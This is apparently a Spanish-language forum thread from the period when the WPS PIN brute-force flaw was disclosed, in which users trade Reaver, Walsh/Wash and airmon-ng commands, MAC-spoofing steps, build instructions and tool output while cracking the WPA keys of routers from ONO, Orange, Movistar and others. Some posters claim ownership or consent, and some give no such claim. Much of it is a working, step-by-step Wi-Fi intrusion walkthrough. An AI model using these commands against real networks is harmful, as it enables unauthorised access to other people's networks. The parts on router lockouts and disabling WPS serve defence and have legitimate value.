A proof-of-concept brute force tool was implemented in Python. It uses the Scapy Library for
decoding, generating, sending and receiving packets. This tool was used on several routers made by
different vendors.
Se habla de 4 a 10 horas para conseguir la clave.
http://code.google.com/p/reaver-wps/ (http://code.google.com/p/reaver-wps/)
yo tengo una pregunta!si yo por ejemplo mi router tiene WPS me pide cuando le doy a conectar el pin o tengo que dar al boton del router?es que no se como va muxo esto.....
saludos
yo tengo una pregunta!si yo por ejemplo mi router tiene WPS me pide cuando le doy a conectar el pin o tengo que dar al boton del router?es que no se como va muxo esto.....
saludos
Es sin darle al botón si no pierde toda la gracia Grin
holaCitarEs sin darle al botón si no pierde toda la gracia Grin
este método tiene el problema de que durante el tiempo de ejecución de la operación que puede llegar a estar operativo hasta dos minutos cualquier aparato se puede autentificar en la red y cuando digo cualquiera también me refiero a los que no sean tuyos ^-^
saludos
hola
siempre esta chimoc ejjejej
saludos
pd usuarionuevo mas curro pa la siguiente
sanson ..la herramienta ya la teneis en wifiway..esta dentro del modulo de raver 1.3
holaCitarsanson ..la herramienta ya la teneis en wifiway..esta dentro del modulo de raver 1.3
¿esto como es posible ?
fecha del descubrimiento 26-12
fecha de lanzamiento de ww 3.0 23-12 ??? ??? ??? ??? ??? ??? ???
saludos
pd he leido algo de que habías visto una coasa interesate y la querias adactar pero llevo unos 4 dias que practicamente no entro si es eso me callo mucho :-X :-X :-X
sanson el wps ...lleva otra herramienta que no recuerdo el nombre ahora mismo
hola
Citarsanson el wps ...lleva otra herramienta que no recuerdo el nombre ahora mismo
solo conozoco el proyecto
https://code.google.com/p/reaver-wps/
saludos
Advertencia - mientras estabas escribiendo, una nueva respuesta fue publicada. Probablemente desees revisar tu mensaje.
con tigo el que pestañea pierde jejejje >:( >:( >:( >:( >:(
y como lo deteneis ??
ctrl+c ??
y del listado que ... lo voy a tener que volver a probar.
sale un listado o algo al darle con ctrl+c ??
yo lo detengo con ctrl+c y despues escribo este comando reaver -i mon0 -b la mac -c el canal -e el nombre -vv (ataque) -d 0 despues de 20 horas de ataque consegui el pin y la clave de una WLAN_xxxx wpa
yo lo detengo con ctrl+c y despues escribo este comando reaver -i mon0 -b la mac -c el canal -e el nombre -vv (ataque) -d 0 despues de 20 horas de ataque consegui el pin y la clave de una WLAN_xxxx wpa
UNA WLAN_XXXX ???
que modelo es ??
es decir los 6 primeros caracteres de la mac ??
no sabia que hubiesen routers de telefonica vulnerables.
te digo mis dispositivos wireless:
atheros AR9280
RL8187L
y la sven snt 1020 que lleva un Rt3070
Supported
The following wireless drivers have been tested or reported to work successfully with Reaver:
ath9k
rtl8187
carl19170
ipw2000
rt2800pci
b43
rt73usb
Partially Supported
The following wireless drivers have had mixed success, and may or may not work depending on your wireless card (i.e., these probably won't work):
ath5k
iwlagn
rtl2800usb
Not Supported
The following wireless drivers/cards have been tested or reported to not work properly with Reaver:
iwl4965
RT3070L
Netgear WG111v3
te digo mis dispositivos wireless:
atheros AR9280
RL8187L
y la sven snt 1020 que lleva un Rt3070
la atheros tambien?
a mi me salta warning receive timeout ocurred eso con la atheros con la RL8187 me dice lo mismo y a veces que no ha associado bien al ap.tambien he visto que me dice,detected AP rate limiting waiting 315 seconds before re-trying
Pero si el modo walsh te dice q es un ap vulnerable al ataque porque despues con reaver saltan los errores ??? ??? ???a mi me salta warning receive timeout ocurred eso con la atheros con la RL8187 me dice lo mismo y a veces que no ha associado bien al ap.tambien he visto que me dice,detected AP rate limiting waiting 315 seconds before re-trying
que leas de una putttttttttttta vez.
¿ que no entienedes que ese router no es vulnerable ? o que jodder ostias ya tio..
ALE ME PIRO A LA FERIA CON LOS NANOS ,YA ESTA BIEN DE FORO POR HOY.
Pero si el modo walsh te dice q es un ap vulnerable al ataque porque despues con reaver saltan los errores ??? ??? ???
es mas sencillo todavia.
yo tengo un linksys que aparece como vulnerable..SOLO , por el hecho de tener wps ...es decir walsh , te marca los routers CON WPS ACTIVADO.
lo cual no siginifica que despues acepten el ataque.
de hecho el linksys que tengo de pruebas , no acepta ni el primer pin.
He leido que incluso algunos routers..desactivan el wps un tiempo al recibir prticiones erroreas. ( lo que hace reaver al enviar pins para ver si responde favorablemente el router )
EL LINKSYS WAG54G2 , LLEVA WPS , Y NO ES VULNERABLE.
Pues lo de MarArrOrt....Si sube una captura con el wireshark quizás podamos ver donde falla.
Trying pin 11765592No es un falso positivo. Evidentemente, ese, es un pin de ataque, no el pin esperado. El script termina prematuramente, diciéndote que no ha hecho nada.
Key cracked in 1 seconds
WPS PIN: "11765592"
Nothing done, nothing to save
Cada vez que pruebo me da 1 pin distinto
P.D.: O bien súbenos un imprint pantalla o nos copias lo último que te da (maquillando)En cambio, esto otro, sí está bastante claro. ¿Tienes dos routers?
estoy usando el programa reaver y quiero guardar los ataques que hise para no volver a empezar de cero alguien sabe el procedimiento a seguir para guardar los ataques ,claro estoy usando el wifiway 3 en live USBhttps://foro.seguridadwireless.net/live-cd-wifiway-1-0-renovation-kde/modulosprogramas-wifiway-3-0-parte-1/msg229487/#msg229487
No es un falso positivo. Evidentemente, ese, es un pin de ataque, no el pin esperado. El script termina prematuramente, diciéndote que no ha hecho nada.
Puede tener WPS activado, pero no ser vulnerable en sí mismo, o a "tus" medios o escenario de ataque.
Hay mucho por investigar.
P.D.: O bien súbenos un imprint pantalla o nos copias lo último que te da (maquillando)En cambio, esto otro, sí está bastante claro. ¿Tienes dos routers?
Realtek RTL8187L
Realtek RTL8187L
ese en teoria es compatible!
Realtek RTL8187L
ese en teoria es compatible!
oh dios! xexudj ha leído!
:D
wifiway ~ # reaver -i mon0 -b 30:46:9A:XX:XX:XX -e ONOXXXX -vv -d 0El Netgear cg3100 sí es vulnerable. Por lo menos yo he probado con un par de ellos y sí eran.
Reaver v1.3 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- Waiting for beacon from 30:46:9A:XX:XX:XX
- Switching mon0 to channel 2
- Switching mon0 to channel 3
- Switching mon0 to channel 4
- Switching mon0 to channel 5
- Switching mon0 to channel 6
- Switching mon0 to channel 7
- Switching mon0 to channel 8
- Switching mon0 to channel 9
- Switching mon0 to channel 10
- Switching mon0 to channel 11
- Switching mon0 to channel 12
- Switching mon0 to channel 13
- Switching mon0 to channel 14
- Switching mon0 to channel 1
- Switching mon0 to channel 2
- Switching mon0 to channel 3
- Switching mon0 to channel 3
- Associated with 30:46:9A:XX:XX:XX (ESSID: ONOXXXX)
- Trying pin 47811607
[!] WARNING: Receive timeout occurred
todo el rato salta el mismo pin y lo de WARNING yo entiendo que el router no es vulnerable o estoy lejos del ap ai 15 metros y dos paredes
Buenas
¿Alguien ha probado la herramienta del descubridor del fallo?
Es un script de perl: http://dl.dropbox.com/u/22108808/wpscrack.zip
Vídeo demo: http://vimeo.com/34402962
Saludos
reaver-wps 1.4
actualizar con:
svn checkout http://reaver-wps.googlecode.com/svn/trunk
cd src
./configure
make
make install
wifiway ~ # walsh -i mon1
Walsh v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel WPS Version WPS Locked ESSID
----------------------------------------------------------------------------------------------
esto me sale con la alpha de 1w
con la atheros interna del portatil lo mismo!posible bug o es que no ai routers vulnerables,con la version anterior si me salia routers vulnerables!!
incluido el mio
He probado reaver y me ha dado la clave (aunque ha tardado casi 5 horas), simplemente es una herramiento genial, mi enhorabuena para los que la han descubierto.
La he probado con la alfa realtekRTL8187.
wifiway ~ # walsh -i mon1
Walsh v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel WPS Version WPS Locked ESSID
----------------------------------------------------------------------------------------------
esto me sale con la alpha de 1w
con la atheros interna del portatil lo mismo!posible bug o es que no ai routers vulnerables,con la version anterior si me salia routers vulnerables!!
incluido el mio
No es problema de tu alfa, ya que a mi tambien me da el mismo mensaje y hay se queda pasando el tiempo, no se si es que tambien habra que esperar unas cuantas horas. Seguramente alguien sepa la respuesta y nos ilumina un poco
yo he probado con la nueva version que USAURIONUEVO ha sacado en el testing de wifiway 3.4
He probado reaver y me ha dado la clave (aunque ha tardado casi 5 horas), simplemente es una herramiento genial, mi enhorabuena para los que la han descubierto.
La he probado con la alfa realtekRTL8187.wifiway ~ # walsh -i mon1
Walsh v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel WPS Version WPS Locked ESSID
----------------------------------------------------------------------------------------------
esto me sale con la alpha de 1w
con la atheros interna del portatil lo mismo!posible bug o es que no ai routers vulnerables,con la version anterior si me salia routers vulnerables!!
incluido el mio
No es problema de tu alfa, ya que a mi tambien me da el mismo mensaje y hay se queda pasando el tiempo, no se si es que tambien habra que esperar unas cuantas horas. Seguramente alguien sepa la respuesta y nos ilumina un poco
hola, me he perdido un poco
en que quedamos en que te da la clave, o que se te queda colgado?
te pregunto desde el desconocimiento de como funciona el software
Yo también fuí a pelo a por mi router...no usé walsh... y tras 11 horas salto PIN, WPA y toda la pesca
wifiway ~ # airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
4828 dhcpcd
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy2]
(monitor mode enabled on mon0)
wifiway ~ # walsh -i mon0
Walsh v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel WPS Version WPS Locked ESSID
----------------------------------------------------------------------------------------------
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
^C
wifiway ~ #
a mi no me sale ni eso!
Yo uso este comando:
reaver -i mon0 -b 30:46:XX:XX:XX:XX -c 12 -e ONOXXXX -vv -a
Con la opción -c se le indica el canal del AP.
Con -a, se recupera siempre la sesión previa (si la hay).
Yo también confirmo que el Netgear es vulnerable ;)
a mi no me sale ni eso!
hola
yo estoy utilizando wifiway 3.4
y tu?
warcry, para que no te salga "[!] Found packet with bad FCS, skipping...", debes usar la opción -C de walsh, quedaría así:
walsh -i mon0 -C
De nada ;)
c minuscula para indicar canal.
C mayuscula, para ignorar paquetes y solo muestre los ap.
Buenas:
walsh --help
Required Arguments:
-i, --interface=<iface> Interface to capture packets on
-f, --file [FILE1 FILE2 FILE3 ...] Read packets from capture files
Optional Arguments:
-c, --channel=<num> Channel to listen on [auto]
-o, --out-file=<file> Write data to file
-n, --probes=<num> Maximum number of probes to send to each AP in scan mode [15]
-C, --ignore-fcs Ignore frame checksum errors
-5, --5ghz Use 5GHz 802.11 channels
-s, --scan Use scan mode
-u, --survey Use survey mode [default]
-h, --help Show help
Un saludo
ChimoC
el mismo
wifiway ~ # airmon-ng start wlan0
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
(monitor mode enabled on mon0)
wifiway ~ # walsh -i mon0 -C
Walsh v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel WPS Version WPS Locked ESSID
----------------------------------------------------------------------------------------------
wifiway ~ # airmon-ng start wlan0
Interface Chipset Driver
wlan0 Atheros AR9285 ath9k - [phy0]
(monitor mode enabled on mon0)
wlan1 Ralink RT2870/3070 rt2800usb - [phy1]
wifiway ~ # airmon-ng start wlan1
Interface Chipset Driver
wlan0 Atheros AR9285 ath9k - [phy0]
wlan1 Ralink RT2870/3070 rt2800usb - [phy1]
(monitor mode enabled on mon1)
mon0 Atheros AR9285 ath9k - [phy0]
wifiway ~ # walsh -i mon1 -C
Scanning for supported APs...
00:1EDITADO WLAN_EDITADO
#!/bin/sh
openssl rand -hex 6 | sed 's/\(..\)/\1:/g; s/.$//'
Por cierto según indican en la página del proyecto la versión svn de kismet detecta los ataques "WPS BruteForce"
pericondecapiskol, ¿te funciona el walsh desde wifiway 3.4?
si me funciona cambiando la mac, como decia en un post anterior magilagorila
wifiway ~ # ifconfig wlan0 down
wifiway ~ # ifconfig wlan0 hw ether 00:01:2a:11:11:11
wifiway ~ # ifconfig wlan0 up
wifiway ~ # airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
3423 dhcpcd
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy0]
(monitor mode enabled on mon0)
wifiway ~ # walsh -i mon0 -C
Walsh v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel WPS Version WPS Locked ESSID
----------------------------------------------------------------------------------------------
Yo tambien estoy usando wifiway 3.4 con reaver con mi router movistar wlan_XXXX con con mac:38:72:C0:xx:xx:xx, y se queda asi todo el rato....no sale nada probando pins ni nada...tiene que ser asi o sucede algo?¿. un saludo compañerosNormas del Foro
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- Waiting for beacon from 38:72:C0:xx:xx:xx
- Associated with 38:72:C0:xx:xx:xx (ESSID: WLAN_xxxx)
Warcry, me parece que no es muy dificil de entender....si lo hago normal, como todo el mundo dice walsh no saca nada de nada....efectivamente, y cambiando despues la mac, que en teoria lo pone para reaver,,,entonces si me funciona el walsh sacandome los routers con wps...y luego arranco el reaver pero se me queda como puse en la captura.
Warcry, me parece que no es muy dificil de entender....si lo hago normal, como todo el mundo dice walsh no saca nada de nada....efectivamente, y cambiando despues la mac, que en teoria lo pone para reaver,,,entonces si me funciona el walsh sacandome los routers con wps...y luego arranco el reaver pero se me queda como puse en la captura.
por que no me pones como he hecho yo lo que haces para que te funcione el walsh,
por que desde luego yo estoy flipando
PD: ahora tengo que ausentarme luego lo miro. 8)
warning:detected AP rate limiting, waiting 315 seconds before re-trying
Parece q algunos routers se defienden, este es el mensaje q me aparece después de estar como 5 minutos comprobando pins reaver:ojala sea esoCódigo: [Seleccionar]warning:detected AP rate limiting, waiting 315 seconds before re-trying
También decir q el Ap se encuentra lejos, y q para comprobar un pin necesita varios envios, quizás el warning sea debido a eso, o a un método de defensa de algunos APs?
Parece q algunos routers se defienden, este es el mensaje q me aparece después de estar como 5 minutos comprobando pins reaver:Código: [Seleccionar]warning:detected AP rate limiting, waiting 315 seconds before re-trying
También decir q el Ap se encuentra lejos, y q para comprobar un pin necesita varios envios, quizás el warning sea debido a eso, o a un método de defensa de algunos APs?
Yo no se cuales son los motivos, pero si que se que al cambiar la mac, y poner el comando walsh -i mon0, es cuando si que funciona, para explicarme mejor, si no cambio la mac no funciona, pero si la cambio si que dice cuales son vulnerables, posteriormente he comprobado que dos solo por curiosidad, y efectivamente walsh no se ha confundido
pues a mi el walsh me saca esto:Código: [Seleccionar]wifiway ~ # airmon-ng start wlan0
Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
4828 dhcpcd
Interface Chipset Driver
wlan0 Ralink RT2870/3070 rt2800usb - [phy2]
(monitor mode enabled on mon0)
wifiway ~ # walsh -i mon0
Walsh v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel WPS Version WPS Locked ESSID
----------------------------------------------------------------------------------------------
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
[!] Found packet with bad FCS, skipping...
^C
wifiway ~ #
entiendo que funciona y no tengo ningun router con wps cerca.
otra opcion es mirarlo como dice gorila.maguila con el wireshark pero claro igual no lo has visto porque esta en la pagina anterior ;)
"entre fina y muy fina", ahora soy yo quien te lo dice a tí, socio xD
Distintas distros.
Distintas versiones de Wifiway.
Distintas versiones de reaver.
Distintas revisiones de una misma versión de reaver.
Interfaces basadas en distintos chips.
...
...
Demasiadas variables a considerar para estar hablando de una misma cosa.
Versión actual sobre la que están trabajando sus creadores: reaver v1.4 r93
Mi experiencia desde Wifiway 3.0 Live USB:
Quitar módulo reaver-1.3.xzm, (si es que lo tienes en tu Wifiway actual).
Desde su página oficial, bajar, compilar e instalar la actual versión en revisión r93.
Para ello, estando conectado a la red, consola y:
svn checkout http://reaver-wps.googlecode.com/svn/trunk
Cuando termine la descarga:
cd trunk
cd src
./configure
make
make install
Desde la r87, walsh ya no se llama así, sino wash, por lo tanto, para ver tu red con WPS y su estado de activación, consola y:
wifiway ~ # wash -i mon0 -C
Wash v1.4 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
BSSID Channel WPS Version WPS Locked ESSID
----------------------------------------------------------------------------------------------
XX:68:0C:XX:XX:33 11 1.0 N WLAN_XXXX
XX:25:2C:XX:XX:04 11 1.0 N WiFiXXXXXX
Para aprobar su eficacia:
wifiway ~ # reaver -i mon0 -b XX:25:2C:XX:XX:04 -c 11 -e WiFiXXXXXX -vv (son dos v no una w)
Reaver v1.4 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
- Switching mon0 to channel 11
- Waiting for beacon from XX:XX:2C:B2:XX:XX
- Associated with XX:25:2C:XX:XX:XX (ESSID: WiFiXXXXXX)
- Trying pin 80875673
- Sending EAPOL START request
- Sending identity response
...
...
Lógicamente, al tratarse de una Live sin permanent changes, si lo quieres conservar, te tendrás que hacer un módulo .xzm.
Info obtenida en la página oficial (en inglés).
https://code.google.com/p/reaver-wps/w/list
creo que perdeis el culo tratando de cazar bugs que son debidos a la efervescencia del código, y que tambien desaparecen de una version a otro por exactamente el mismo motivo.
vais derrochando energías para sacar nada en claro.
esto es una beta señores. un poco de calma.
queda mucho por ver.
(...) y para hacer un modulo con toda esta historieta, coges el xmz que ya esta hecho del reaver 1.3 que ese si que funciona.
(...) y para hacer un modulo con toda esta historieta, coges el xmz que ya esta hecho del reaver 1.3 que ese si que funciona.
Y, acogiéndome a lo expresado en tu pie de SM: Amén.
creo que no me he explicado bien
(...) ahora ferlan propone una cosa nueva que entiendo que el ha probado y dice chinit que el reaver le da error, luego me lleva a pensar que ferlan lo único que ha probado es el walsh o wash y santaspascuas dejando el reaver por el camino.
Ya he dejado bien claro que es mi experiencia personal, no una solución hecha para users.
En el soporte de ejecución, versión Wifiway y chipset interface que he dejado señalados en anteriores posts,
que si warcry cree en eso del aprendizaje? hace dos dias era novato total, ahora está dando sopas con ondas a medio staff incluido yo xD
no he tenido tiempo de mirar todo esto para daros una solucion ,
se que monte el reaver 1.4 del svn , no recuerdo la revision he hice una prueba y funcionaba perfecto ,.
ahora no va..al meterlo dentro de uno de los modulos " master " .
los modulos master , me refiero a los que contiene un apartado de la live , si leeis los nomres comprendereis que hay un modulo maste rpara cada categoria..uno con aplicaciones wireless ...otro con el escritorio (kde ) , otro con el servidor de ventanas y tareas multimedia, drivers graficos etc ( xorg ) .
pues cuando testeo algo lo meto al finald e carga ..osea el ultimo , hay es muy probable que todo funcione siempre , otra cosa es que despues al meterlo dentro de uno de los modulos master siga funcionando bien ,.
cuando tenga un hueco lo mirare , pero confirmo que el 1.4 de wifiway no va fino.
buenas, me lo he compilado (bajandolo por svn) lo ultimo , cuando lanzo reaver 1.4r93 con la wifistation Ext al rato de empezar "segmentation fault"
colisiones entre un modulo master (el master de aplicaciones wireless, supongo) y el modulo reaver?
usuario, estas seguro? porque es raro, no? si apenas son unos binarios.
entonces, habria que quitar el viejo reaver del master antes de planchar el nuevo reaver contra el modulo master?
quieres que te rastree overmountings entre ellos?
warcry , sobre lo que dices , de cambiar un modulo por otro , .. has tenido suerte , por que los cambios hechos de la v3 a la 3.4 de wifiway afectaban a otros modulos pero no al wireless.
alist3r , sobre las colisiones no son entre modulos , no se explicartelo , pero tiene que ver con el hecho de tener modulos en 2 directorios separados , segun donde estan se comportan de una manera o de otra.
he descubierto que al meter modulos en el directorio "modules" , no me digas por que, pero hay librerias que mueren estando en "base" ... mueves todo a la base y todo funciona ok.
ya he comentado varias veces antes , comportamientos de este tipo , pero nadie sabe nada.
yo ize prueba con la reaver 1.4 y no consegui nada , luego ize pruebas con el 3.0 v3 con reaver 1.3 y algo mas consegui , ize las pruebas con mi alfa 1w y la AWUS036NHR , puse walsh -i mon0 , coji mi red k me salia es una wlan_xxxx con la mac 64:68:0c , y ize el ataque reaver y me decia esto : warning last message not processed properly , reverting state to previous message .¿tu router tiene wps?¿lo tienes activado?
yo pienso que el mensaje me sale porque mi router no es compatible ... vosotros me podeis quitar la curiosidad de porque no va ¿? muchas gracias! menudo currazos os dais sois unos genios!! :D
... mueves todo a la base y todo funciona ok.
el sistema carga todos los modulos de BASE, en orden alfabético de shell
luego , carga ENCIMA todos los modulos de MODULES en orden alfabético de shell tambien
ergo, no es lo mismo un xzm en base que en modules, por lo que a prioridad respecta. en caso de sobremontaje, siempre ganan los de MODULES.
lo miramos con mas calma
Buenas
Por si alguno tiene la curiosidad intelectual de saber como se genera el PIN y como se calcula el checksum del mismo, puede echarle un vistazo a esto:
MasterControl.cpp (http://code.google.com/p/open1211/source/browse/trunk/apps/wsc/src/common/MasterControl/MasterControl.cpp?spec=svn9&r=9)
Saludos
Buenas
Por si alguno tiene la curiosidad intelectual de saber como se genera el PIN y como se calcula el checksum del mismo, puede echarle un vistazo a esto:
MasterControl.cpp (http://code.google.com/p/open1211/source/browse/trunk/apps/wsc/src/common/MasterControl/MasterControl.cpp?spec=svn9&r=9)
Saludos
que depresión, ni en tres décadas sabría por donde meterle mano a eso.
me voy a la cama mañana será otro día
PD: vaya mazazo para la moral :-\
Bueno tras meter el moduilo de reaver 1.3 ha cascado una red ono con el consentimiento del propietario. Pass correcta.
wps pin 63825xx
wpa pin 3638xxxxxx
mac: a0:21:b7:xx:xx
ono4xx
Gracias a warcry por colgar el modulo, copiar y pegar.
Tiempo empleado 19 horas, tengo que decir que estoy bastante retirado del ap, calidad de la señal debil.
Comando utilizado -i ( especeficar interfaz modo monitor) -b ( mac ap ) -c ( canal) -d 6 -t 6 -vv
estoy flipando con estos agujerazos de seguridad...
Bueno por fin me decido a postear, soy un gran lector del foro desde hace años pero nunca he posteado, pero creo que la ocasion lo requiere.
Haciedo pruebas, como todos en este post, me he topado con esto:
(http://i2.photobucket.com/albums/y32/tulicoca/wps/WPS.jpg)
No se porque razon ha sido instantaneo pero hay teneis la prueba. No se si es el tipo de router o simplemente coincidencia de que el pin enviado ha sido el correcto.
Utilizo Wifiway 3.4 (Instalada en HD) y realtek 8187 de 2000mw.
¿Os ha pasado a alguno? Por cierto seguir asi, sois geniales. Un salu2.
Pero has hecho alguna modificación??
Si no me he perdido nada, reaver 1.4 no funciona correctamente con el último wifiway 3.4 ???
Pero has hecho alguna modificación??
Si no me he perdido nada, reaver 1.4 no funciona correctamente con el último wifiway 3.4 ???
que yo sepa lo que no va es el walsh, que no detecta ningun ap vulnerable, el reaver a pelo (osease diciendole tu todo de a quien tiene que atacar) en principio si que va.
con lo cual, si tu estas ciego y no sabes a quien atacar, en principio (ya que se han explicado otras formas de localizar ap,s vulnerables) pues es perder el tiempo ejecutarlo al tun tun sin mas.
tema pegado , creo que ya se lo merecia algunos dias
olaa a todos quiero informar que el router de ono:00:26:5B:XX:XX:XX es vulnerable su fabricante es Hitron me a dao la clave y el pin en unas 12 horas!
P.D:me gustaria saber como desactivar el wps en el router dado que no veo la opcion.
saludos
olaa a todos quiero informar que el router de ono:00:26:5B:XX:XX:XX es vulnerable su fabricante es Hitron me a dao la clave y el pin en unas 12 horas!
P.D:me gustaria saber como desactivar el wps en el router dado que no veo la opcion.
saludos
bueno os comento mi trabajo:
lo primero wifiway 3.0.4 + RTL 8187 + Reaver 1.3 OK tambien con la atheros
wifiway 3.0.4 + RTL 8187 + Reaver 1.4 no funciona wash o walsh,pero reaver si.lo mismo con atheros que tengo interna en mi pc
bactrack 5 r1 mas reaver compilado desde el svn funciona todo ok con la atheros y la RTL 8187 funciona wash y reaver
saludos a todos
MI PUNTO DE VISTA:actualizar el reaver que lleva el wifiway 3.4 que lleva de serie aver si surje el mismo error,si surjer el mismo error ya no se me ocurren mas ideas
Alguien lo ha conseguido con una Orange?? Por ahora los que he visto les a dado error, yo tengo una en casa de mi abuela, probaré a ver que pasa y os comento...
Hola , acabo de vulnerar el router de mi hermano (12 horas aprox.).
- Orange-3XXE
- MAC: 7C:03:4C:XX:XX:XF
- WPS: 4626XXXX
- WPA PSK: 5F24XXXX
- Segun veo en la clave por defecto... de este tipo de router, los dos últimos dígitos del ESSID, coinciden en la quinta y sexta posición de la clave de 8 caractéres. >:( >:D ^-^
olaa a todos quiero informar que el router de ono:00:26:5B:XX:XX:XX es vulnerable su fabricante es Hitron me a dao la clave y el pin en unas 12 horas!
P.D:me gustaria saber como desactivar el wps en el router dado que no veo la opcion.
saludos
Casualidades de la vida que R-Cable también ponen un Hitron , solo en opción de 30 / 100Mb y ya tengo el WPS desactivado desde el primer día ^-^ (aún no estaba descubierta la vulnerabilidad) y si es vulnerable.
olaa a todos quiero informar que el router de ono:00:26:5B:XX:XX:XX es vulnerable su fabricante es Hitron me a dao la clave y el pin en unas 12 horas!
P.D:me gustaria saber como desactivar el wps en el router dado que no veo la opcion.
saludos
Casualidades de la vida que R-Cable también ponen un Hitron , solo en opción de 30 / 100Mb y ya tengo el WPS desactivado desde el primer día ^-^ (aún no estaba descubierta la vulnerabilidad)
pos dime como lo as echo xk en el manual no me sale nada!
olaa a todos quiero informar que el router de ono:00:26:5B:XX:XX:XX es vulnerable su fabricante es Hitron me a dao la clave y el pin en unas 12 horas!
P.D:me gustaria saber como desactivar el wps en el router dado que no veo la opcion.
saludos
mi router es negro,es nuevecito me lo trajeron el viernes.y vulnerable
Casualidades de la vida que R-Cable también ponen un Hitron , solo en opción de 30 / 100Mb y ya tengo el WPS desactivado desde el primer día ^-^ (aún no estaba descubierta la vulnerabilidad)
pos dime como lo as echo xk en el manual no me sale nada!
Va a ser que tengo modelo distinto al que dices de Ono , Hitron si , pero distinto :(
https://foro.seguridadwireless.net/aplicaciones-y-diccionarios-linux/wpsig-escaner-wps/
esto se merece otro modulo no?voy a ver si soy capaz de hacerlo y funciona.a los desarradores de wifiway necesito el modulo que subio warcry pero sin el wpsreaver,para instarlarlo de 0 y hacer un nuevo modulo con la nueva version
hola
ok gracias bajado
slaudos
pd co onoes con los captcha 3 veces lo he tenido que poner son ilegible 8)
hola
ok gracias bajado
slaudos
pd co onoes con los captcha 3 veces lo he tenido que poner son ilegible 8)
lo siento tio , pero estoy atado , multiupload aun no deja subir ficheros.
(http://img217.imageshack.us/img217/5849/instant1.png)
warcry ...tu como te lo montaste de otra manera .no se si te servira.
deberas rescatar el modulo original numero 6 , de wifiway 3.4.
a ver si me hechais una mano me he descargado el wifiway 3.0 lo he metido en el usb y no hace boot me sale el primer mensaje y ahi se queda luego me he descargado el 3.4 y ese si me arranca sin problemas pero el walsh no me anda y por lo que me comentais el del 3.0 va bien pero por lo visto esta version creo que ha dado problemas con el boot se os ocurre algo gracias
Hola, muy buenas tardes.
He estado haciendo pruebas de ataque wps con reaver 1.3 en WW3.0 a otro tipo de router que tengo, en casa de mi novia, (Smc networks). Y... al cabo de una semana, he podido terminar de la siguiente manera:
.......................
Me supongo que , por lo que he leido por aquí; que hay routers vulnerables a este tipo de ataque y... otros que no.
No espero respueta, simplemente aportar un dato más insignificante. disculpen las molestias
The vendor states that Technicolor products use an anti brute-force mechanism: after 5 retries, the access point is locked for 5 minutes. A penetration test performed by the vendor found that to exhaust every possible PIN would take around 189.44 hours (about 7.89 days).
The vendor plans to implement the exponential timeout algorithm as recommended by the WiFi Alliance to improve the anti brute-force mechanism. Customers should contact the vendor to inquiry when firmware updates will be available that include this feature.
